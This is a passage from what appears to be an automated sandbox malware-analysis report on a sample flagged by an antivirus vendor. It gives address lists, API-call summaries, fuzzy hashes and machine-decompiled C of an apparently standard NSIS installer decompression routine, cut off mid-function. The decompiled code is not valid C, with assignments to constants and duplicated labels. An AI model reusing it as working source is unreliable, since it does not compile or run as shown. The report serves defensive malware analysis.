                                                              						goto L1;
                                                              					} else {
                                                              						goto L5;
                                                              					}
                                                              				}
                                                              				L1:
                                                              				return 0;
                                                              			}









                                                              0x0040604b
                                                              0x00406056
                                                              0x0040605a
                                                              0x00406061
                                                              0x0040606d
                                                              0x0040607d
                                                              0x0040607f
                                                              0x00406097
                                                              0x00406098
                                                              0x0040609f
                                                              0x004060a0
                                                              0x00000000
                                                              0x00000000
                                                              0x00406083
                                                              0x0040608a
                                                              0x00406092
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040608a
                                                              0x004060a2
                                                              0x004060a8
                                                              0x00000000
                                                              0x004060b6
                                                              0x0040606f
                                                              0x00406075
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406075
                                                              0x0040605c
                                                              0x00000000

                                                              APIs
                                                                • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                                • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,76083420,?,76082EE0,00405D94,?,76083420,76082EE0,00000000), ref: 00405FF0
                                                                • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                                • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                              • lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,76083420,?,76082EE0,00405D94,?,76083420,76082EE0,00000000), ref: 00406098
                                                              • GetFileAttributesW.KERNELBASE(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,76083420,?,76082EE0,00405D94,?,76083420,76082EE0), ref: 004060A8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                              • String ID: P_B
                                                              • API String ID: 3248276644-906794629
                                                              • Opcode ID: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                              • Instruction ID: df110f430b83b9381375b5fd3fa67f6c4419d4890c6468873e0fced3c2676832
                                                              • Opcode Fuzzy Hash: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                              • Instruction Fuzzy Hash: 0DF07826144A1216E622B23A0C05BAF05098F82354B07063FFC93B22E1DF3C8973C43E
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 99%
                                                              			E00407194() {
                                                              				signed int _t530;
                                                              				void _t537;
                                                              				signed int _t538;
                                                              				signed int _t539;
                                                              				unsigned short _t569;
                                                              				signed int _t579;
                                                              				signed int _t607;
                                                              				void* _t627;
                                                              				signed int _t628;
                                                              				signed int _t635;
                                                              				signed int* _t643;
                                                              				void* _t644;
                                                              
                                                              				L0:
                                                              				while(1) {
                                                              					L0:
                                                              					_t530 =  *(_t644 - 0x30);
                                                              					if(_t530 >= 4) {
                                                              					}
                                                              					 *(_t644 - 0x40) = 6;
                                                              					 *(_t644 - 0x7c) = 0x19;
                                                              					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
                                                              					while(1) {
                                                              						L145:
                                                              						 *(_t644 - 0x50) = 1;
                                                              						 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                              						while(1) {
                                                              							L149:
                                                              							if( *(_t644 - 0x48) <= 0) {
                                                              								goto L155;
                                                              							}
                                                              							L150:
                                                              							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
                                                              							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
                                                              							 *(_t644 - 0x54) = _t643;
                                                              							_t569 =  *_t643;
                                                              							_t635 = _t569 & 0x0000ffff;
                                                              							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
                                                              							if( *(_t644 - 0xc) >= _t607) {
                                                              								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
                                                              								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
                                                              								_t628 = _t627 + 1;
                                                              								 *_t643 = _t569 - (_t569 >> 5);
                                                              								 *(_t644 - 0x50) = _t628;
                                                              							} else {
                                                              								 *(_t644 - 0x10) = _t607;
                                                              								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
                                                              								 *_t643 = (0x800 - _t635 >> 5) + _t569;
                                                              							}
                                                              							if( *(_t644 - 0x10) >= 0x1000000) {
                                                              								L148:
                                                              								_t487 = _t644 - 0x48;
                                                              								 *_t487 =  *(_t644 - 0x48) - 1;
                                                              								L149:
                                                              								if( *(_t644 - 0x48) <= 0) {
                                                              									goto L155;
                                                              								}
                                                              								goto L150;
                                                              							} else {
                                                              								L154:
                                                              								L146:
                                                              								if( *(_t644 - 0x6c) == 0) {
                                                              									L169:
                                                              									 *(_t644 - 0x88) = 0x18;
                                                              									L170:
                                                              									_t579 = 0x22;
                                                              									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
                                                              									_t539 = 0;
                                                              									L172:
                                                              									return _t539;
                                                              								}
                                                              								L147:
                                                              								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                                              								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                              								_t484 = _t644 - 0x70;
                                                              								 *_t484 =  &(( *(_t644 - 0x70))[1]);
                                                              								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                              								goto L148;
                                                              							}
                                                              							L155:
                                                              							_t537 =  *(_t644 - 0x7c);
                                                              							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
                                                              							while(1) {
                                                              								L140:
                                                              								 *(_t644 - 0x88) = _t537;
                                                              								while(1) {
                                                              									L1:
                                                              									_t538 =  *(_t644 - 0x88);
                                                              									if(_t538 > 0x1c) {
                                                              										break;
                                                              									}
                                                              									L2:
                                                              									switch( *((intOrPtr*)(_t538 * 4 +  &M00407602))) {
                                                              										case 0:
                                                              											L3:
                                                              											if( *(_t644 - 0x6c) == 0) {
                                                              												goto L170;
                                                              											}
                                                              											L4:
                                                              											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                              											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                              											_t538 =  *( *(_t644 - 0x70));
                                                              											if(_t538 > 0xe1) {
                                                              												goto L171;
                                                              											}
                                                              											L5:
                                                              											_t542 = _t538 & 0x000000ff;
                                                              											_push(0x2d);
                                                              											asm("cdq");
                                                              											_pop(_t581);
                                                              											_push(9);
                                                              											_pop(_t582);
                                                              											_t638 = _t542 / _t581;
                                                              											_t544 = _t542 % _t581 & 0x000000ff;
                                                              											asm("cdq");
                                                              											_t633 = _t544 % _t582 & 0x000000ff;
                                                              											 *(_t644 - 0x3c) = _t633;
                                                              											 *(_t644 - 0x1c) = (1 << _t638) - 1;
                                                              											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
                                                              											_t641 = (0x300 << _t633 + _t638) + 0x736;
                                                              											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
                                                              												L10:
                                                              												if(_t641 == 0) {
                                                              													L12:
                                                              													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
                                                              													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                                              													goto L15;
                                                              												} else {
                                                              													goto L11;
                                                              												}
                                                              												do {
                                                              													L11:
                                                              													_t641 = _t641 - 1;
                                                              													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
                                                              												} while (_t641 != 0);
                                                              												goto L12;
                                                              											}
                                                              											L6:
                                                              											if( *(_t644 - 4) != 0) {
                                                              												GlobalFree( *(_t644 - 4));
                                                              											}
                                                              											_t538 = GlobalAlloc(0x40, 0x600); // executed
                                                              											 *(_t644 - 4) = _t538;
                                                              											if(_t538 == 0) {
                                                              												goto L171;
                                                              											} else {
                                                              												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
                                                              												goto L10;
                                                              											}
                                                              										case 1:
                                                              											L13:
                                                              											__eflags =  *(_t644 - 0x6c);
                                                              											if( *(_t644 - 0x6c) == 0) {
                                                              												L157:
                                                              												 *(_t644 - 0x88) = 1;
                                                              												goto L170;
                                                              											}
                                                              											L14:
                                                              											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                              											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
                                                              											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                              											_t45 = _t644 - 0x48;
                                                              											 *_t45 =  *(_t644 - 0x48) + 1;
                                                              											__eflags =  *_t45;
                                                              											L15:
                                                              											if( *(_t644 - 0x48) < 4) {
                                                              												goto L13;
                                                              											}
                                                              											L16:
                                                              											_t550 =  *(_t644 - 0x40);
                                                              											if(_t550 ==  *(_t644 - 0x74)) {
                                                              												L20:
                                                              												 *(_t644 - 0x48) = 5;
                                                              												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
                                                              												goto L23;
                                                              											}
                                                              											L17:
                                                              											 *(_t644 - 0x74) = _t550;
                                                              											if( *(_t644 - 8) != 0) {
                                                              												GlobalFree( *(_t644 - 8));
                                                              											}
                                                              											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
                                                              											 *(_t644 - 8) = _t538;
                                                              											if(_t538 == 0) {
                                                              												goto L171;
                                                              											} else {
                                                              												goto L20;
                                                              											}
                                                              										case 2:
                                                              											L24:
                                                              											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
                                                              											 *(_t644 - 0x84) = 6;
                                                              											 *(_t644 - 0x4c) = _t557;
                                                              											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
                                                              											goto L132;
                                                              										case 3:
                                                              											L21:
                                                              											__eflags =  *(_t644 - 0x6c);
                                                              											if( *(_t644 - 0x6c) == 0) {
                                                              												L158:
                                                              												 *(_t644 - 0x88) = 3;
                                                              												goto L170;
                                                              											}
                                                              											L22:
                                                              											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                              											_t67 = _t644 - 0x70;
                                                              											 *_t67 =  &(( *(_t644 - 0x70))[1]);
                                                              											__eflags =  *_t67;
                                                              											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                              											L23:
                                                              											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
                                                              											if( *(_t644 - 0x48) != 0) {
                                                              												goto L21;
                                                              											}
                                                              											goto L24;
                                                              										case 4:
                                                              											L133:
                                                              											_t559 =  *_t642;
                                                              											_t626 = _t559 & 0x0000ffff;
                                                              											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
                                                              											if( *(_t644 - 0xc) >= _t596) {
                                                              												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
                                                              												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
                                                              												 *(_t644 - 0x40) = 1;
                                                              												_t560 = _t559 - (_t559 >> 5);
                                                              												__eflags = _t560;
                                                              												 *_t642 = _t560;
                                                              											} else {
                                                              												 *(_t644 - 0x10) = _t596;
                                                              												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                                              												 *_t642 = (0x800 - _t626 >> 5) + _t559;
                                                              											}
                                                              											if( *(_t644 - 0x10) >= 0x1000000) {
                                                              												goto L139;
                                                              											} else {
                                                              												goto L137;
                                                              											}
                                                              										case 5:
                                                              											L137:
                                                              											if( *(_t644 - 0x6c) == 0) {
                                                              												L168:
                                                              												 *(_t644 - 0x88) = 5;
                                                              												goto L170;
                                                              											}
                                                              											L138:
                                                              											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                                              											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                              											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                              											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                              											L139:
                                                              											_t537 =  *(_t644 - 0x84);
                                                              											L140:
                                                              											 *(_t644 - 0x88) = _t537;
                                                              											goto L1;
                                                              										case 6:
                                                              											L25:
                                                              											__edx = 0;
                                                              											__eflags =  *(__ebp - 0x40);
                                                              											if( *(__ebp - 0x40) != 0) {
                                                              												L36:
                                                              												__eax =  *(__ebp - 4);
                                                              												__ecx =  *(__ebp - 0x38);
                                                              												 *(__ebp - 0x34) = 1;
                                                              												 *(__ebp - 0x84) = 7;
                                                              												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                              												goto L132;
                                                              											}
                                                              											L26:
                                                              											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                              											__esi =  *(__ebp - 0x60);
                                                              											__cl = 8;
                                                              											__cl = 8 -  *(__ebp - 0x3c);
                                                              											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                              											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                              											__ecx =  *(__ebp - 0x3c);
                                                              											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                              											__ecx =  *(__ebp - 4);
                                                              											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                              											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                              											__eflags =  *(__ebp - 0x38) - 4;
                                                              											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                              											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                              											if( *(__ebp - 0x38) >= 4) {
                                                              												__eflags =  *(__ebp - 0x38) - 0xa;
                                                              												if( *(__ebp - 0x38) >= 0xa) {
                                                              													_t98 = __ebp - 0x38;
                                                              													 *_t98 =  *(__ebp - 0x38) - 6;
                                                              													__eflags =  *_t98;
                                                              												} else {
                                                              													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                              												}
                                                              											} else {
                                                              												 *(__ebp - 0x38) = 0;
                                                              											}
                                                              											__eflags =  *(__ebp - 0x34) - __edx;
                                                              											if( *(__ebp - 0x34) == __edx) {
                                                              												L35:
                                                              												__ebx = 0;
                                                              												__ebx = 1;
                                                              												goto L61;
                                                              											} else {
                                                              												L32:
                                                              												__eax =  *(__ebp - 0x14);
                                                              												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                              												__eflags = __eax -  *(__ebp - 0x74);
                                                              												if(__eax >=  *(__ebp - 0x74)) {
                                                              													__eax = __eax +  *(__ebp - 0x74);
                                                              													__eflags = __eax;
                                                              												}
                                                              												__ecx =  *(__ebp - 8);
                                                              												__ebx = 0;
                                                              												__ebx = 1;
                                                              												__al =  *((intOrPtr*)(__eax + __ecx));
                                                              												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                              												goto L41;
                                                              											}
                                                              										case 7:
                                                              											L66:
                                                              											__eflags =  *(__ebp - 0x40) - 1;
                                                              											if( *(__ebp - 0x40) != 1) {
                                                              												L68:
                                                              												__eax =  *(__ebp - 0x24);
                                                              												 *(__ebp - 0x80) = 0x16;
                                                              												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                              												__eax =  *(__ebp - 0x28);
                                                              												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                              												__eax =  *(__ebp - 0x2c);
                                                              												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                              												__eax = 0;
                                                              												__eflags =  *(__ebp - 0x38) - 7;
                                                              												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                              												__al = __al & 0x000000fd;
                                                              												__eax = (__eflags >= 0) - 1 + 0xa;
                                                              												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                              												__eax =  *(__ebp - 4);
                                                              												__eax =  *(__ebp - 4) + 0x664;
                                                              												__eflags = __eax;
                                                              												 *(__ebp - 0x58) = __eax;
                                                              												goto L69;
                                                              											}
                                                              											L67:
                                                              											__eax =  *(__ebp - 4);
                                                              											__ecx =  *(__ebp - 0x38);
                                                              											 *(__ebp - 0x84) = 8;
                                                              											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                              											goto L132;
                                                              										case 8:
                                                              											L70:
                                                              											__eflags =  *(__ebp - 0x40);
                                                              											if( *(__ebp - 0x40) != 0) {
                                                              												__eax =  *(__ebp - 4);
                                                              												__ecx =  *(__ebp - 0x38);
                                                              												 *(__ebp - 0x84) = 0xa;
                                                              												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                              											} else {
                                                              												__eax =  *(__ebp - 0x38);
                                                              												__ecx =  *(__ebp - 4);
                                                              												__eax =  *(__ebp - 0x38) + 0xf;
                                                              												 *(__ebp - 0x84) = 9;
                                                              												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                              												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                              											}
                                                              											goto L132;
                                                              										case 9:
                                                              											L73:
                                                              											__eflags =  *(__ebp - 0x40);
                                                              											if( *(__ebp - 0x40) != 0) {
                                                              												goto L90;
                                                              											}
                                                              											L74:
                                                              											__eflags =  *(__ebp - 0x60);
                                                              											if( *(__ebp - 0x60) == 0) {
                                                              												goto L171;
                                                              											}
                                                              											L75:
                                                              											__eax = 0;
                                                              											__eflags =  *(__ebp - 0x38) - 7;
                                                              											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                              											__eflags = _t259;
                                                              											0 | _t259 = _t259 + _t259 + 9;
                                                              											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                              											goto L76;
                                                              										case 0xa:
                                                              											L82:
                                                              											__eflags =  *(__ebp - 0x40);
                                                              											if( *(__ebp - 0x40) != 0) {
                                                              												L84:
                                                              												__eax =  *(__ebp - 4);
                                                              												__ecx =  *(__ebp - 0x38);
                                                              												 *(__ebp - 0x84) = 0xb;
                                                              												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                              												goto L132;
                                                              											}
                                                              											L83:
                                                              											__eax =  *(__ebp - 0x28);
                                                              											goto L89;
                                                              										case 0xb:
                                                              											L85:
                                                              											__eflags =  *(__ebp - 0x40);
                                                              											if( *(__ebp - 0x40) != 0) {
                                                              												__ecx =  *(__ebp - 0x24);
                                                              												__eax =  *(__ebp - 0x20);
                                                              												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                              											} else {
                                                              												__eax =  *(__ebp - 0x24);
                                                              											}
                                                              											__ecx =  *(__ebp - 0x28);
                                                              											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                              											L89:
                                                              											__ecx =  *(__ebp - 0x2c);
                                                              											 *(__ebp - 0x2c) = __eax;
                                                              											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                              											L90:
                                                              											__eax =  *(__ebp - 4);
                                                              											 *(__ebp - 0x80) = 0x15;
                                                              											__eax =  *(__ebp - 4) + 0xa68;
                                                              											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                              											goto L69;
                                                              										case 0xc:
                                                              											L99:
                                                              											__eflags =  *(__ebp - 0x6c);
                                                              											if( *(__ebp - 0x6c) == 0) {
                                                              												L164:
                                                              												 *(__ebp - 0x88) = 0xc;
                                                              												goto L170;
                                                              											}
                                                              											L100:
                                                              											__ecx =  *(__ebp - 0x70);
                                                              											__eax =  *(__ebp - 0xc);
                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              											_t334 = __ebp - 0x70;
                                                              											 *_t334 =  *(__ebp - 0x70) + 1;
                                                              											__eflags =  *_t334;
                                                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              											__eax =  *(__ebp - 0x2c);
                                                              											goto L101;
                                                              										case 0xd:
                                                              											L37:
                                                              											__eflags =  *(__ebp - 0x6c);
                                                              											if( *(__ebp - 0x6c) == 0) {
                                                              												L159:
                                                              												 *(__ebp - 0x88) = 0xd;
                                                              												goto L170;
                                                              											}
                                                              											L38:
                                                              											__ecx =  *(__ebp - 0x70);
                                                              											__eax =  *(__ebp - 0xc);
                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              											_t122 = __ebp - 0x70;
                                                              											 *_t122 =  *(__ebp - 0x70) + 1;
                                                              											__eflags =  *_t122;
                                                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              											L39:
                                                              											__eax =  *(__ebp - 0x40);
                                                              											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                              											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                              												goto L48;
                                                              											}
                                                              											L40:
                                                              											__eflags = __ebx - 0x100;
                                                              											if(__ebx >= 0x100) {
                                                              												goto L54;
                                                              											}
                                                              											L41:
                                                              											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                              											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                              											__ecx =  *(__ebp - 0x58);
                                                              											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                              											 *(__ebp - 0x48) = __eax;
                                                              											__eax = __eax + 1;
                                                              											__eax = __eax << 8;
                                                              											__eax = __eax + __ebx;
                                                              											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                              											__ax =  *__esi;
                                                              											 *(__ebp - 0x54) = __esi;
                                                              											__edx = __ax & 0x0000ffff;
                                                              											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                              											__eflags =  *(__ebp - 0xc) - __ecx;
                                                              											if( *(__ebp - 0xc) >= __ecx) {
                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                              												__cx = __ax;
                                                              												 *(__ebp - 0x40) = 1;
                                                              												__cx = __ax >> 5;
                                                              												__eflags = __eax;
                                                              												__ebx = __ebx + __ebx + 1;
                                                              												 *__esi = __ax;
                                                              											} else {
                                                              												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                              												 *(__ebp - 0x10) = __ecx;
                                                              												0x800 = 0x800 - __edx;
                                                              												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                              												__ebx = __ebx + __ebx;
                                                              												 *__esi = __cx;
                                                              											}
                                                              											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                              											 *(__ebp - 0x44) = __ebx;
                                                              											if( *(__ebp - 0x10) >= 0x1000000) {
                                                              												goto L39;
                                                              											} else {
                                                              												L45:
                                                              												goto L37;
                                                              											}
                                                              										case 0xe:
                                                              											L46:
                                                              											__eflags =  *(__ebp - 0x6c);
                                                              											if( *(__ebp - 0x6c) == 0) {
                                                              												L160:
                                                              												 *(__ebp - 0x88) = 0xe;
                                                              												goto L170;
                                                              											}
                                                              											L47:
                                                              											__ecx =  *(__ebp - 0x70);
                                                              											__eax =  *(__ebp - 0xc);
                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              											_t156 = __ebp - 0x70;
                                                              											 *_t156 =  *(__ebp - 0x70) + 1;
                                                              											__eflags =  *_t156;
                                                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              											while(1) {
                                                              												L48:
                                                              												__eflags = __ebx - 0x100;
                                                              												if(__ebx >= 0x100) {
                                                              													break;
                                                              												}
                                                              												L49:
                                                              												__eax =  *(__ebp - 0x58);
                                                              												__edx = __ebx + __ebx;
                                                              												__ecx =  *(__ebp - 0x10);
                                                              												__esi = __edx + __eax;
                                                              												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                              												__ax =  *__esi;
                                                              												 *(__ebp - 0x54) = __esi;
                                                              												__edi = __ax & 0x0000ffff;
                                                              												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                              												__eflags =  *(__ebp - 0xc) - __ecx;
                                                              												if( *(__ebp - 0xc) >= __ecx) {
                                                              													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                              													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                              													__cx = __ax;
                                                              													_t170 = __edx + 1; // 0x1
                                                              													__ebx = _t170;
                                                              													__cx = __ax >> 5;
                                                              													__eflags = __eax;
                                                              													 *__esi = __ax;
                                                              												} else {
                                                              													 *(__ebp - 0x10) = __ecx;
                                                              													0x800 = 0x800 - __edi;
                                                              													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                              													__ebx = __ebx + __ebx;
                                                              													 *__esi = __cx;
                                                              												}
                                                              												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                              												 *(__ebp - 0x44) = __ebx;
                                                              												if( *(__ebp - 0x10) >= 0x1000000) {
                                                              													continue;
                                                              												} else {
                                                              													L53:
                                                              													goto L46;
                                                              												}
                                                              											}
                                                              											L54:
                                                              											_t173 = __ebp - 0x34;
                                                              											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                              											__eflags =  *_t173;
                                                              											goto L55;
                                                              										case 0xf:
                                                              											L58:
                                                              											__eflags =  *(__ebp - 0x6c);
                                                              											if( *(__ebp - 0x6c) == 0) {
                                                              												L161:
                                                              												 *(__ebp - 0x88) = 0xf;
                                                              												goto L170;
                                                              											}
                                                              											L59:
                                                              											__ecx =  *(__ebp - 0x70);
                                                              											__eax =  *(__ebp - 0xc);
                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              											_t203 = __ebp - 0x70;
